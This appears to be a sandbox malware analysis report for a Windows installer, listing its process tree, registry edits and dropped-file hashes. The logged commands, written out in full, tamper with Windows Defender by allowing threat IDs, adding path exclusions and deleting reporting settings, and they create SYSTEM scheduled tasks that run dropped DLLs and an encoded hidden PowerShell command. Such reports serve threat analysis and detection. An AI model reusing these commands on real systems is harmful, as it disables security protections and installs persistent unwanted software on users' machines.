C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\LTyeqJn.exeC:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\LTyeqJn.exe 3x /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ATZmuaBwNwmU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ATZmuaBwNwmU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QYiUKrukFVUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QYiUKrukFVUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SHsJRQZsU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SHsJRQZsU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aJAQLsoDkiWqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aJAQLsoDkiWqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fxkldoUMcXUSOxVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fxkldoUMcXUSOxVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MYjwJFnMfsmfKHMw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MYjwJFnMfsmfKHMw\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fxkldoUMcXUSOxVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fxkldoUMcXUSOxVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MYjwJFnMfsmfKHMw /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MYjwJFnMfsmfKHMw /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSvKTThdo" /SC once /ST 03:39:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSvKTThdo"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSvKTThdo"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VgOpnHVQDAdMZqNFB" /SC once /ST 00:20:47 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\jEdXIro.exe\" aF /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "VgOpnHVQDAdMZqNFB"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\jEdXIro.exeC:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\jEdXIro.exe aF /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bNHXguvSZYiOwSiXLC"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SHsJRQZsU\ppPWzT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "DNDvMcbpefrYjKZ" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DNDvMcbpefrYjKZ2" /F /xml "C:\Program Files (x86)\SHsJRQZsU\uUBGhOq.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DNDvMcbpefrYjKZ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DNDvMcbpefrYjKZ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WEhIDiLYPHjasB" /F /xml "C:\Program Files (x86)\ATZmuaBwNwmU2\vOVJfVJ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uMLBCyigOFctO2" /F /xml "C:\ProgramData\fxkldoUMcXUSOxVB\JtarwXX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kiDkdQMpQtFhhDeJz2" /F /xml "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\FlnmNKo.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VjVOLqrPjSeucnEqiOK2" /F /xml "C:\Program Files (x86)\aJAQLsoDkiWqC\FGzrdXx.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mDNVJgqIdbaAfzWWp" /SC once /ST 04:39:25 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MYjwJFnMfsmfKHMw\gZjnNUFa\gOscNFO.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "mDNVJgqIdbaAfzWWp"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VgOpnHVQDAdMZqNFB"2⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MYjwJFnMfsmfKHMw\gZjnNUFa\gOscNFO.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MYjwJFnMfsmfKHMw\gZjnNUFa\gOscNFO.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "mDNVJgqIdbaAfzWWp"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\ATZmuaBwNwmU2\vOVJfVJ.xmlFilesize
2KB
MD553e968136f32d50bc469de23f0b5d252
SHA1a6566d03992d03a1bf695a1acaa0d7ba4d56e78e
SHA256062f5a460c14c04d6de333fbff2fe6fa88753a3844b0a2bc0bf2d71a21e34ef7
SHA51201a27c4f58050adbd087bdec06056557ba2e543cc7afd5b0038a9e8e667f32309b565ea6f5a70825622fe17e2de89061807b8ab13d371b87887f8984776c55a0
-
C:\Program Files (x86)\SHsJRQZsU\uUBGhOq.xmlFilesize
2KB
MD506b22c4808df8e553fb0f11798a8f056
SHA10840a92f3d03aedf5e74db6ed7476d7e9efd5177
SHA256fce20c43d9c7846afea418accdcc3a029c15a4fdcb3ac660cd91de6282302418
SHA5129bcff40cf19dfe6d3d3a6d8e0ad95357aebc588c8fe7691b323e55079c5c61cff0c453ff0f5c21df1e1a40befcaf5ee688d142e14341b6cc35d22b8a803d2690
-
C:\Program Files (x86)\aJAQLsoDkiWqC\FGzrdXx.xmlFilesize
2KB
MD5a4e10053d71cb3ad2cb038a9c4dbe785
SHA11325d73e09a99d681536a5b555a033c65ded4fd0
SHA256f34724cef7aea22f56934a7221484a37bcf426b22a1baaaf3bcd30b0ad5d86e2
SHA512e48997308d1cd97096509d6cd75e6063c0221ce312de86c5edd27d515ba2bd91aa288dcf830a0986f0e639682071f32137fe5b9426aa271f360940371487dcb5
-
C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\FlnmNKo.xmlFilesize
2KB
MD5704e3b32996207fbe04e9f967777ed89
SHA165ee8ba7406723b085c44f0b3d79b764c95aed46
SHA256d062e7b943a826895b2f4ca08a2b6bb5d8d618801debd3305d10d9951c1f01b8
SHA51280b0af39cd5b365e18a8a21569b63bb6a2991b3e3b930c357fd7c87ef214ee02df23dfd64d48220d6df33afb2b925bfcf2f1c670aa73309c9aa31fd4ede0101d
-
C:\ProgramData\fxkldoUMcXUSOxVB\JtarwXX.xmlFilesize
2KB
MD505de6f5c657b2cda25dc75a4d9257c22
SHA1a32481b6f81f7799b450f8760834ee34a702c405
SHA256cab56d7bdcfe19b860568289c2abd9acf7737fe633d2b1953f5c05c60dc90bd2
SHA512256782d654851b17beab7f813158500b17793385307e293a2f3f8e207836afe0149012cb8bdbb7585e4b0ee8be1c955003d0986ccaf1239ebd3962270e763a0a
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD50ff7e1af4cc86e108eef582452b35523
SHA1c2ccf2811d56c3a3a58dced2b07f95076c6b5b96
SHA25662ed8ef2250f9f744852cb67df0286c80f94e26aed646989b76e5b78f2f1f0d0
SHA512374675fd36cd8bc38acaec44d4cc855b85feece548d99616496d498e61e943fd695fec7c57550a58a32455e8b21b41bafa18cd1dadac69676fff1de1a56da937
-
C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exeFilesize
6.4MB
MD5b829866d020ee2184ddb6915ea4190e2
SHA1bd2466f3e57f4b1a9e0661d79e0cc22d7eac81fa
